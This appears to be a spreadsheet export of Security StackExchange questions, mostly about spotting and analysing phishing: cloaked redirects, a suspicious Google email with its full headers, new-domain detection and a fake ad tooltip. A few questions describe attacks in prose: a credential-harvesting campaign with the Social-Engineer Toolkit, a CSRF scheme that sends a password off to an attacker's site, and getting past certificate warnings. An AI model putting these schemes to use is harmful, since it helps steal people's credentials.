    <t>&lt;p&gt;There are URLs which its only purpose is to redirect the HTTP requestor to a correct website. Say, if I tried to access example.com/0wa/RaNd0m from my computer, it would redirect me to wikipedia.com. But if I tried it from my Virtual Machine in AWS, it would redirect me to a malicious site. Why is the final web page different for every different computer? Can you explain the step-by-step (technical) process of how this works? I believe this happens because the redirection proxy is checking the IP address and then sends the requestor accordingly. Please correct me if I am wrong.&lt;/p&gt;
 &lt;p&gt;If I wanted to analyze the malicious website, I would frequently have to log in to one of my AWS virtual machines (each having different Public IP) and then visit the URL. Is there a better way of doing this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;network&gt;&lt;phishing&gt;&lt;spoofing&gt;&lt;url-redirection&gt;&lt;web&gt;</t>
  </si>
  <si>
    <t>What is going on in what looks like an attack that checks out?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email (text and source below), that looks socially like phishing but looks technically like it will check out. My best guess is that Unicode has been used to copy domain names.&lt;/p&gt;
 &lt;p&gt;The text of the webpage is:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Action required: Your Google Account is temporarily disabled&lt;br&gt;
  Hi,
  We‚Äôve detected unusual activity in your Google Account jonathan.hayward@pobox.com and locked it to protect your information.&lt;/p&gt;
  &lt;ol&gt;
  &lt;li&gt;Sign in to your account or to any Google service as soon as possible, to reactivate your account.&lt;/li&gt;
  &lt;li&gt;Use the Security Checkup to verify and improve your account‚Äôs security.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p&gt;The Google Accounts team&lt;/p&gt;
  &lt;p&gt;This email can't receive replies. For more information, visit the Google Accounts Help Center.&lt;/p&gt;
  &lt;p&gt;You received this mandatory email service announcement to update you about important changes to your Google product or account.&lt;/p&gt;
  &lt;p&gt;¬© 2017 Google Inc., 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The source is:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Delivered-To: christos.jonathan.hayward@gmail.com
 Received: by 10.80.213.202 with SMTP id g10csp342702edj;
  Thu, 7 Sep 2017 09:56:54 -0700 (PDT)
 X-Received: by 10.55.98.18 with SMTP id w18mr4723276qkb.163.1504803414371;
  Thu, 07 Sep 2017 09:56:54 -0700 (PDT)
 ARC-Seal: i=1; a=rsa-sha256; t=1504803414; cv=none;
  d=google.com; s=arc-20160816;
  b=XSHE33mgAcZ4yoC2LYtMjwi15HSRD3yFoK8PfZqbikT2HsD7kna1ZbQoqfsU+SkbrX
  FQOIrjhEzlqeJo2rSktzXjlqoANFlgDC3Ng75scS50pD9hKPPdcL9q+kMzdZWgY2z9f8
  JG4EqfmEuVZyzeTSbFLOw7xRKOZMzC2PTtXldp70+Vn47eHgHXq0TrbwrlF9v6wDbWcZ
  4FvVV10pt/mjTxY0xd2xhcFOL9slZ55sEoGBJjxWGta29A/8ixb88XFXwWyfMAz5aQ9g
  7XklLamjcWELUwdar0YJ/12XxCTz8JOoYOUcqLYM1KqgR9Fe7ZQ1u/QATAnObodT8Q+I
  mdRw==
 ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
  h=to:from:subject:message-id:feedback-id:date:mime-version
  :dkim-signature:delivered-to:arc-authentication-results;
  bh=UolmLh0qPQQ90zBwrHeckq1lbjvl7J88mUQGg78J32o=;
  b=zJhCpHDJjE2eWTbs4gg3uB7A1HYY6U1ilAByF3b28IRJYYz0s2zF5Zs9m3zHFCR/nK
  QIqffIjcWkxVJK8aqgYCN9OIuc/7TWNvcs5di1pAOwi+n9+TGarcyOwEusunDtpPcoGL
  iw/ysZrXh6bKcBO7eYT8YsfKVJrNr6hEUWCkKsUHEqZq2ya2CrJvK9kO/6Md/6jvsgbU
  H63R4uuolFr5jT/EEZSfdbb/F3vgAU7sBfH0U777sx0SGxW7p8yU1ISAbQ9LWqC9fWQ6
  PO8oygngzAKvXHxSP+yP13Vzwd1WrCZgrYiCMbh1UqbfUZqUZOtDc+6cNFiG+bA09LIK
  ajig==
 ARC-Authentication-Results: i=1; mx.google.com;
  dkim=pass header.i=@accounts.google.com header.s=20161025 header.b=f6IaG5Yo;
  spf=pass (google.com: domain of srs0=jfi5=ai=gaia.bounces.google.com=3vxqxwqgtaoirs-vitpceggsyrxw.ksskpi.gsq@bounce2.pobox.com designates 64.147.108.55 as permitted sender) smtp.mailfrom=SRS0=jFi5=AI=gaia.bounces.google.com=3VXqxWQgTAOIRS-VITPcEGGSYRXW.KSSKPI.GSQ@bounce2.pobox.com;
  dmarc=pass (p=REJECT sp=REJECT dis=NONE) header.from=accounts.google.com
 Return-Path: 
 Received: from pb-mx14.pobox.com (pb-mx14.pobox.com. [64.147.108.55])
  by mx.google.com with ESMTPS id k65si103352qkf.467.2017.09.07.09.56.54
  for 
  (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
  Thu, 07 Sep 2017 09:56:54 -0700 (PDT)
 Received-SPF: pass (google.com: domain of srs0=jfi5=ai=gaia.bounces.google.com=3vxqxwqgtaoirs-vitpceggsyrxw.ksskpi.gsq@bounce2.pobox.com designates 64.147.108.55 as permitted sender) client-ip=64.147.108.55;
 Authentication-Results: mx.google.com;
  dkim=pass header.i=@accounts.google.com header.s=20161025 header.b=f6IaG5Yo;
  spf=pass (google.com: domain of srs0=jfi5=ai=gaia.bounces.google.com=3vxqxwqgtaoirs-vitpceggsyrxw.ksskpi.gsq@bounce2.pobox.com designates 64.147.108.55 as permitted sender) smtp.mailfrom=SRS0=jFi5=AI=gaia.bounces.google.com=3VXqxWQgTAOIRS-VITPcEGGSYRXW.KSSKPI.GSQ@bounce2.pobox.com;
  dmarc=pass (p=REJECT sp=REJECT dis=NONE) header.from=accounts.google.com
 Received: from pb-mx14.nyi.icgroup.com (localhost [127.0.0.1]) by pb-mx14.pobox.com (Postfix) with ESMTP id 0BF4F20189 for ; Thu,
  7 Sep 2017 12:56:54 -0400 (EDT)
 X-Pobox-Loop-ID: 5f0919ca6722ee2ad126d239e3273c1129427ad0
 Delivered-To: jonathan.hayward@pobox.com
 X-Pobox-Delivery-ID: E285A2-D270B20187-1504803414-07697135!pb-mx14.pobox.com
 Received: from mail-yw0-f199.google.com (mail-yw0-f199.google.com [209.85.161.199]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (No client certificate requested) by pb-mx14.pobox.com (Postfix) with ESMTPS id D270B20187 for ; Thu,
  7 Sep 2017 12:56:53 -0400 (EDT)
 Received: by mail-yw0-f199.google.com with SMTP id x144so231194ywd.15
  for ; Thu, 07 Sep 2017 09:56:53 -0700 (PDT)
 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
  d=accounts.google.com; s=20161025;
  h=mime-version:date:feedback-id:message-id:subject:from:to;
  bh=UolmLh0qPQQ90zBwrHeckq1lbjvl7J88mUQGg78J32o=;
  b=f6IaG5YoON7KwOWfbnsZSjxoe2hN1HFuMygE5IObxV0T1uDGSGCk0O8s6at2iDabV3
  4bVGZhnz404/QdnOsWtXq1jLjBuZY0CfnCzchTTpFFS7O30kjHPGaTgwKJueW3/rUuUY
  v5M5aTgv/Z5G92XIEMDR0ArtKtyt0Yb4H00dgj3XcWQGYytjueeNrbzIYT7/bolTI8py
  3arHkjMjPu144HV22VlCzHJsscX0kgNjxDzIkTUPAiH87J8DJKQpeAW3QqMcl9NOJwZ2
  yY62lXywy0VjTJluIE2Mp2rIzypT9xpy6DR2u0X2+puY2CkSAABK5LiqAMAu1TOs7ahY
  78BQ==
 X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
  d=1e100.net; s=20161025;
  h=x-gm-message-state:mime-version:date:feedback-id:message-id:subject
  :from:to;
  bh=UolmLh0qPQQ90zBwrHeckq1lbjvl7J88mUQGg78J32o=;
  b=nbjdinMFQvgeKuClIZZteD6R9yuaPJVPTNyw+AXejnR4IFU0iglDTb+WN35rhir9Ky
  w8oI+R73AjzEmhrHHnLzuYKJCh5iSS+miWtM6IMccTVEom/IRb4HIPytICgchy7lA8aZ
  imVmrxPna2E0kkkHVzCqpDBzkQXST9m4p4m3mESvq6uZYt+r/VtXjZjbMlVS10AqXkUB
  Y7hJ9DlSIB6dNEUkTh1g0bpwa/E/A2TyhcorFGfwp72HiX20q3W/Dgys1oo6zuAYJgQI
  vJJqgdwMuVRfrrGhRiRe8e3BwLTT32O9t5GbjXJ0rMD/60XCXfz22R0Y+LztYHxDOGyO
  +4UA==
 X-Gm-Message-State: AHPjjUgzmSZPgCWmHX9MPzCSGSmIw4njupwzCIc0Utr0EXvA0HAYfDgd v46KxhtuxEOCF8zAr4DDITXl097WRldz
 X-Google-Smtp-Source: ADKCNb4JVdIC05q1wFsStNjSNVjkYZ1onuhcEX2PMg9EGRKbX5+p6JVMW3HQmMc6Pnw9ANRxDif9hkAW4qhBGJpJG6gdqA==
 MIME-Version: 1.0
 X-Received: by 10.13.214.84 with SMTP id y81mr2097463ywd.103.1504803413568; Thu, 07 Sep 2017 09:56:53 -0700 (PDT)
 Date: Thu, 7 Sep 2017 16:56:14 +0000 (UTC)
 X-Notifications: XEAAAAIxDcr8zzNnoAtSR2bobk0A
 X-Account-Notification-Type: 68
 Feedback-ID: 68:account-notifier
 Message-ID: 
 Subject: Action required: Your Google Account is temporarily disabled
 From: Google 
 To: jonathan.hayward@pobox.com
 Content-Type: multipart/alternative; boundary="94eb2c0762b0ec2da405589c58ad"
 X-Pobox-Client-Address: 209.85.161.199
 X-Pobox-Client-Name: mail-yw0-f199.google.com
 X-Pobox-Client-HELO: mail-yw0-f199.google.com
 X-Pobox-Original-Sender: 3VXqxWQgTAOIRS-VITPcEGGSYRXW.KSSKPI.GSQ@gaia.bounces.google.com
 --94eb2c0762b0ec2da405589c58ad
 Content-Type: text/plain; charset="UTF-8"; format=flowed; delsp=yes
 Content-Transfer-Encoding: base64
 QWN0aW9uIHJlcXVpcmVkOiBZb3VyIEdvb2dsZSBBY2NvdW50IGlzIHRlbXBvcmFyaWx5IGRpc2Fi
 bGVkDQoNCg0KDQpIaSwNCldl4oCZdmUgZGV0ZWN0ZWQgdW51c3VhbCBhY3Rpdml0eSBpbiB5b3Vy
 IEdvb2dsZSBBY2NvdW50DQpqb25hdGhhbi5oYXl3YXJkQHBvYm94LmNvbSBhbmQgbG9ja2VkIGl0
 IHRvIHByb3RlY3QgeW91ciBpbmZvcm1hdGlvbi4NCg0KMS4gU2lnbiBpbiB0byB5b3VyIGFjY291
 bnQgPGh0dHBzOi8vbXlhY2NvdW50Lmdvb2dsZS5jb20+IG9yIHRvIGFueSBHb29nbGUNCnNlcnZp
 Y2UgYXMgc29vbiBhcyBwb3NzaWJsZSwgdG8gcmVhY3RpdmF0ZSB5b3VyIGFjY291bnQuMi4gVXNl
 IHRoZSBTZWN1cml0eQ0KQ2hlY2t1cCA8aHR0cHM6Ly9teWFjY291bnQuZ29vZ2xlLmNvbS9zZWN1
 cmVhY2NvdW50PiB0byB2ZXJpZnkgYW5kIGltcHJvdmUNCnlvdXIgYWNjb3VudOKAmXMgc2VjdXJp
 dHkuDQpUaGUgR29vZ2xlIEFjY291bnRzIHRlYW0NCg0KDQoNClRoaXMgZW1haWwgY2FuJ3QgcmVj
 ZWl2ZSByZXBsaWVzLiBGb3IgbW9yZSBpbmZvcm1hdGlvbiwgdmlzaXQgdGhlIEdvb2dsZQ0KQWNj
 b3VudHMgSGVscCBDZW50ZXIgPGh0dHBzOi8vc3VwcG9ydC5nb29nbGUuY29tL21haWwvYW5zd2Vy
 LzUwMjcwPi4NCg0KDQoNCllvdSByZWNlaXZlZCB0aGlzIG1hbmRhdG9yeSBlbWFpbCBzZXJ2aWNl
 IGFubm91bmNlbWVudCB0byB1cGRhdGUgeW91IGFib3V0DQppbXBvcnRhbnQgY2hhbmdlcyB0byB5
 b3VyIEdvb2dsZSBwcm9kdWN0IG9yIGFjY291bnQuDQoNCsKpIDIwMTcgR29vZ2xlIEluYy4sIDE2
 MDAgQW1waGl0aGVhdHJlIFBhcmt3YXksIE1vdW50YWluIFZpZXcsIENBIDk0MDQzLCBVU0ENCmV0
 OjY4DQo=
 --94eb2c0762b0ec2da405589c58ad
 Content-Type: text/html; charset="UTF-8"
 Content-Transfer-Encoding: quoted-printable
 @media s=
 creen and (min-width: 600px) {.v2sp {padding: 6px 34px 0px;}}=
 Action required: Your Google Account is temporarily disab=
 led=
 Hi,We=E2=80=99=
 ve detected unusual activity in your Google Account jonathan.hayward@pob=
 ox.com and locked it to protect your information.&lt;br/&gt;&lt;br&gt;&lt;dd&gt;1. Sign in to your account or to any Google ser=
 vice as soon as possible, to reactivate your account.&lt;/dd&gt;&lt;dd&gt;2. Use the Security Checkup to verify=
  and improve your account=E2=80=99s security.&lt;/dd&gt;The Google Accounts=
  teamThis email can't receive replies. For more in=
 formation, visit the Google Accounts Help Center.You received this mandatory email service announcement to=
  update you about important changes to your Google product or account.=
 &amp;copy; 2017 Google Inc., 1600 Amphitheatre Parkway, Mountain View=
 , CA 94043, USAet:68
 --94eb2c0762b0ec2da405589c58ad--
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;How, besides basic social blunders on the attacker's end, can I recognize the phishing?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;--UPDATE--&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I started writing the note below as a comment to an answer, then realized I should have put this in the question from the beginning. I wrote:&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;One comment that I probably should have added:&lt;/strong&gt; I have a main email address, christos.jonathan.hayward@gmail.com, which can send email through several addresses, including sending email from jonathan.hayward@pobox.com by logging into pobox servers. The second address has no separate Gmail account, just a passport to get in to pobox.com and send emails, if you will. I read the quoted email from the first address, which does not seem impaired in any way.&lt;/p&gt;
 &lt;p&gt;And more specifically, I've sent test emails to and from jonathan.hayward@pobox.com. All of them have gotten through uneventfully.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Mindlessly clicked days old phishing email link appeared dead</t>
  </si>
  <si>
    <t>&lt;p&gt;Was multitasking and mindlessly clicked Squarespace phishing email. Page didn't load, and right away I realized my mistake. Completed several malware scans which came back clean. The button link source was &lt;code&gt;https://sqwe7.com/&lt;/code&gt;. &lt;/p&gt;
 &lt;p&gt;The domain was registered on Aug 8, I got the email Aug 9, but didn't click till Aug 11. The domain is no longer active. &lt;/p&gt;
 &lt;p&gt;Did my getting to the email late save me? I searched but can't find any other history on the domain other than it being tagged as phishing Aug 9. Couldn't find any other links when inspecting the source of the link, unless I am missing something, which is very possible.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;email&gt;&lt;phishing&gt;&lt;scan&gt;</t>
  </si>
  <si>
    <t>Securing a Personal Hotspot</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm buying a brand new phone, added to it: a new line and SIM card, along with a brand new laptop, to use my phone's network as a hotspot. I will not be using these devices for anything but personal banking (I'll be visiting my broker's website and tradingview.com - absolutely no other website). I'll be using free text apps like "TextNow" to make calls and texts and will NEVER reveal my real number to anyone. As for physically securing the devices, I'm considering buying an RFID signal blocking faraday bag to keep these devices in, and storing the bag within an aluminum storage case, painted with nickel or copper-based paint. This case will be locked. &lt;/p&gt;
 &lt;p&gt;If no one has physical access to these devices but me, run a full disk-encryption on the laptop, keep both devices consistently updated, don't store passwords in either device, avoid phishing or social engineering attempts, and constantly switch locations from where I'm accessing my hotspot, how difficult would it be for penetrating my traffic? What are some of the measures I missed to avoid wireless attacks (i.e.traffic monitoring software, browsing habits)? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wifi&gt;&lt;monitoring&gt;&lt;hotspot&gt;</t>
  </si>
  <si>
    <t>Cutting down phishing attacks from AmazonSES</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to work on cutting down on the amount of spam, phishing, and malicious emails coming through via AmazonSES burners.&lt;/p&gt;
 &lt;p&gt;Has anyone devised a method or certain IOCs to block on?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;amazon&gt;</t>
  </si>
  <si>
    <t>Setoolkit - credential harvester, only display the first character of the password</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm launching a spear phishing campaign and my client has specifically asked me to only harvest the first character of the password, is there a way to do so? &lt;/p&gt;
 &lt;p&gt;Basically instead of showing the whole password when a user will input theirs, I want only the first character to appear.&lt;/p&gt;
 &lt;p&gt;Otherwise, is it possible to produce a hashing when the password is being sent to the apache server?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;hash&gt;&lt;metasploit&gt;&lt;kali-linux&gt;</t>
  </si>
  <si>
    <t>Does investigating the .eml file of an email suffice to deem it malicious?</t>
  </si>
  <si>
    <t>&lt;p&gt;Let's say that I want to test whether an email in my inbox is safe or not. Can I tell this with 100% certainty just by investigating the .eml file or are there some other places to check for absolute certainty?&lt;/p&gt;
 &lt;p&gt;When I mean safe I mean safe from all possible attacks but mostly code that targets some exploit in the email client.&lt;/p&gt;
 &lt;p&gt;EDIT No2: So far the answers for my question are associated with the deception of the user (i.e phishing techniques). What about the aspect of exploiting the email client vulnerabilities? Will the evidence of such an attack exist in the email source? Also in my question I ask how to investigate the email for its safety and not if someone can send me an email pretending to be safe.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;email&gt;&lt;detection&gt;</t>
  </si>
  <si>
    <t>Are brand-new DNS registrations an easy way to detect phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;Today I received an SMS&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;AusPost: Your package address is incorrect and delivery failed, please
 update address information via the link.
 &lt;code&gt;https://auspost.requestupdate.com&lt;/code&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;If I do a &lt;code&gt;whois auspost.requestupdate.com&lt;/code&gt; by &lt;a href="https://www.whois.com/whois/auspost.requestupdate.com" rel="nofollow noreferrer"&gt;https://www.whois.com/whois/auspost.requestupdate.com&lt;/a&gt; I get nothing. It either gives me auspost.com or requestupdate.com. This seems to vary based on history&lt;/p&gt;
 &lt;p&gt;However &lt;code&gt;whois requestupdate.com&lt;/code&gt; gives&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; Registered On: 2022-08-17
  Expires On: 2023-08-17
  Updated On: 2022-08-17
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;So I was thinking that this is a pretty obvious phishing attempt - is that correct or am I missing something?&lt;/p&gt;
 &lt;p&gt;I also got the following&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; Name Servers: ns1.nnaab.co, ns2.nnaab.co
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Whois of nnaab.co gives&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; Registrar: NameSilo, LLC
  Registered On: 2022-07-06
  Expires On: 2023-07-06
  Updated On: 2022-08-05
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;It all seems too easy to see how suspicious this is due to the DNS ages associated with TELSTRA - is that correct or am I missing something?&lt;/p&gt;
 &lt;p&gt;Is there anything automatic which detects this age-type signature and can take an action, such as telling a firewall/IPS that this DNS query, and hence IP address, is to a known-bad address?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;dns&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Could certificate authority be bypassed?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;em&gt;"The DNSChanger Trojan replaces the name servers with their own in order to
 direct web and other requests from the infected host to a set of attacker-controlled servers that can
 intercept, inspect, and modify the infected host traffic."&lt;/em&gt; &lt;/p&gt;
 &lt;p&gt;My question is how can attacker phished a site which using CA certificate? After successfully changing of DNS Address - if victim visits &lt;a href="https://www.google.com" rel="nofollow noreferrer"&gt;https://www.google.com&lt;/a&gt; then s/he will see
 a message saying that &lt;code&gt;connection with site is not secure&lt;/code&gt; and other warning message in browser. Is there any way to bypass it?&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to manage admin rights for helpdesk staff?</t>
  </si>
  <si>
    <t>&lt;p&gt;My question is about issuing administrative rights to helpdesk staff in a large Active Directory setting.&lt;/p&gt;
 &lt;p&gt;Helpdesk staff commonly require administrative rights to provide support for end users. I know that this is commonly done (see &lt;a href="https://serverfault.com/questions/249050/allow-windows-domain-users-local-admin-rights-on-subset-of-domain-computers"&gt;[1]&lt;/a&gt; &lt;a href="https://serverfault.com/questions/167916/windows-2003-domain-best-way-to-assign-permisions-to-technical-support"&gt;[2]&lt;/a&gt; &lt;a href="https://serverfault.com/questions/83686/how-to-create-a-limited-domain-admin-that-does-not-have-access-to-domain-contr"&gt;[3]&lt;/a&gt;) by creating a &lt;code&gt;"Workstation Admins"&lt;/code&gt; group, and adding that group to the local &lt;code&gt;Administrators&lt;/code&gt; group on each PC. Ideally, the helpdesk staff will use a low-privilege account for daily tasks, and only use their &lt;code&gt;"Workstation Admins"&lt;/code&gt; account when needed.&lt;/p&gt;
 &lt;p&gt;System Administrators commonly do the same thing, and use an account with higher privileges when accessing servers. This makes sense because servers are trusted machines that are protected both physically and electronically. Therefore, logging in to a server with a privileged account is basically safe.&lt;/p&gt;
 &lt;p&gt;However, staff at the helpdesk will be logging into machines that were probably constantly left unattended and used for daily email or web browsing. These computers &lt;strong&gt;can't be trusted&lt;/strong&gt; the same way servers can. It's easy to imagine a staff member at the helpdesk logging in to a computer which contains a malware payload that immediately spreads across the network because it has admin rights on many other computers.&lt;/p&gt;
 &lt;p&gt;Or worse, a malicious user could perform a real-life phishing scam by having a keylogger on their computer, then having somebody from the helpdesk log in.&lt;/p&gt;
 &lt;p&gt;Is there any way to give helpdesk staff the access they need without creating a significant risk? (I can imagine an ideal solution would use a one-time password for authentication, and the logged-in the user would only be authorized as a local administrator. In other words, I want the helpdesk staff to have access to ANY computer, not EVERY computer.)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;windows&gt;&lt;malware&gt;&lt;active-directory&gt;&lt;authorization&gt;</t>
  </si>
  <si>
    <t>Can postMessage be used to forward data to hacker's iframe in CSRF attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;Consider a user that has an open session to a legitimate site with a password on it. This page has no anti-CSRF token. &lt;/p&gt;
 &lt;p&gt;A hacker creates a webpage with 2 hidden iframes. One iframe does a GET on the page with the password and sends this password via html5 windows.postMessage() to another iframe (sourcing the attacker's site) which takes this password and sends it off to the hacker's site via a query parameter in an http get to a hacker's web service.&lt;/p&gt;
 &lt;p&gt;Via phishing attack, the hacker entices user with open session to click on the link for his webpage having these 2 iframes and steals the password.&lt;/p&gt;
 &lt;p&gt;Is this attack possible?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;csrf&gt;&lt;same-origin-policy&gt;&lt;html-5&gt;</t>
  </si>
  <si>
    <t>Windows Defender catches Trojan right after clean install</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently upgraded some desktop PC components (GPU, SSD). I decided to perform a clean install of Windows 10 onto the SSD. I used a USB created using the Installation Media tool provided by Microsoft, which I created on my personal laptop.&lt;/p&gt;
 &lt;p&gt;During the initial Windows Update after the first restart, a Trojan ‚ÄúTrojan:HTML/Phish.GR!MSR‚Äù is immediately identified, without me doing anything else aside from the Windows Update. No webpages visited, no files downloaded, nothing.&lt;/p&gt;
 &lt;p&gt;I‚Äôm no security expert, so I tried swapping my old parts with the upgraded ones to control the cause and check if my new components had anything to do with it, but it appears randomly. I suspect it‚Äôs the installation USB, but not sure.&lt;/p&gt;
 &lt;p&gt;Any idea what could cause this? What can I do if I can‚Äôt even trust a clean Windows install?!&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Windows Defender flags microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd[1].svg as the threat. The file is in the IE cache somewhere&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;antivirus&gt;&lt;phishing&gt;&lt;windows-10&gt;&lt;trojan&gt;</t>
  </si>
  <si>
    <t>How did "tech-supportcenter" phishers trick Google?</t>
  </si>
  <si>
    <t>&lt;p&gt;Related: &lt;a href="https://security.stackexchange.com/questions/41527/is-the-web-browser-status-bar-always-trustable"&gt;Is the Web browser status bar always trustable?&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://security.stackexchange.com/questions/126400/how-can-google-search-change-the-location-in-a-url-tooltip"&gt;How can Google search change the location in a URL tooltip?&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I've always thought you can "hover" over a link to see where it really goes, until today.&lt;/p&gt;
 &lt;p&gt;A coworker (working from home) searched for "Target" in Google Search (using edge). He clicked the top result, which happened to be an ad, and was redirected to a phishing page posing as Microsoft trying to get him to call a "tech support" number.&lt;/p&gt;
 &lt;p&gt;I got the same results on a different computer, on a different network. When I hover over the link, both links show "www.target.com" at the bottom, but clicking the ad link takes you to a malware page and the second link (first search result after the ad) takes you to the real Target.com page.&lt;/p&gt;
 &lt;p&gt;If displaying the wrong URL in the tooltip requires Javascript, how did tech-supportcenter get their Javascript onto the Google search results page?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/ja1BJ.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/ja1BJ.png" alt="ad for &amp;quot;target&amp;quot; leading to malware site"&gt;&lt;/a&gt;
 &lt;a href="https://i.stack.imgur.com/Bd7PF.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/Bd7PF.png" alt="real search result for Target"&gt;&lt;/a&gt;
 &lt;a href="https://i.stack.imgur.com/PYNCS.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/PYNCS.png" alt="malware page"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;UPDATE
 Here's the same results in a virtual machine with a fresh install of Windows, on a different network:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/tbyPE.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/tbyPE.png" alt="same results in virtual machine on different network"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Here's the source for the URL. It looks like it does include the "onmousedown" Javascript as the first question I linked to mentioned. Does Google allow advertisers to display any URL they want for the tooltip?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/FUxsb.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/FUxsb.png" alt="page source for bad link"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;google&gt;&lt;url-redirection&gt;</t>
  </si>
  <si>
    <t>What can an attacker do in this scenario? (unwritable bashrc, profile, etc.)</t>
  </si>
  <si>
    <t>&lt;p&gt;Scenario:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Typical Linux desktop setup: unprivileged user but with sudo capabilities to do basically everything&lt;/li&gt;
 &lt;li&gt;For the sake of argument let's forget about X11 and its way to allow trivial keyloggers, so let's say the distro is using Wayland or whatever&lt;/li&gt;
 &lt;li&gt;Path is defined in bash profile so that ~/bin comes last, so running "firefox" should run the default firefox and not a custom "firefox" installed by the user in their home directory.&lt;/li&gt;
 &lt;li&gt;.bashrc, .profile, .bash_profile, .bash_logout, etc. (all those kinds of files) are only writable by root, so the user needs to use sudo to edit them.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;The attacker then gives the user a malicious file, the user runs it without privileges (without sudo), and... what could the attacker achieve? At the moment I can only think of "plain phishing", that is, the malicious code will try to imitate another application, for example telling you a system update is required, and asking for your sudo/root password. But I suspect there are much more possible vectors.&lt;/p&gt;
 &lt;p&gt;I'm asking this question because I read that preventing the abuse of bashrc and similar config files is useless if the attacker can run arbitrary code on your computer. Yet I can't think of all the things an attacker could do in practice in this situation. I'd like some practical examples.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;linux&gt;&lt;attack-vector&gt;&lt;bash&gt;&lt;code-execution&gt;&lt;sudo&gt;</t>
  </si>
  <si>
    <t>Is my email, pc or something else hacked?</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently I registered iCloud account with my gmail account. Now I received fake email from &amp;quot;iCloud&amp;quot; on mail.com email address which I use frequently for registering accounts on various sites. &lt;strong&gt;This email address is also recovery address for the gmail account.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Here's the fake email:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/zBTuA.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/zBTuA.png" alt="fake icloud email" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Also, something similar happened when I transferred money from paypal to my bank account. Couple days after transferring money, I received fake PayPal email with link (phishing I guess) telling me my paypal acc is limited and I wont be able to send or receive money. That email came to my mail.com account, which I also use for paypal account.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;malware&gt;&lt;account-security&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What's the purpose behind this phishing attempt?</t>
  </si>
  <si>
    <t>&lt;p&gt;As probably all of you, I got an email that was intended as a phishing attack.&lt;/p&gt;
 &lt;p&gt;The HTML version of the email was pretending to be a Facebook email of a security warning.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/Dprzq.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/Dprzq.png" alt="phishing image" /&gt;&lt;/a&gt;&lt;/p&gt;
